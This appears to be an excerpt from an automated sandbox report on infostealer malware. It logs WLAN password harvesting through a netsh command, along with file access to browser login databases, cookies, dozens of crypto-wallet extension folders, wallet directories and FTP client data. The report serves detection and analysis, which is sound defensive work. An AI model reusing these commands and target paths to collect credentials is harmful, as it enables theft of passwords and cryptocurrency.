Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA

Source: Yara match	File source: 7.2.H3tyh96.exe.8ec0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.H3tyh96.exe.8ec0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.3299078255.000000000073C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000003.3140498967.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 75f24a4b40.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 75f24a4b40.exe PID: 5036, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE
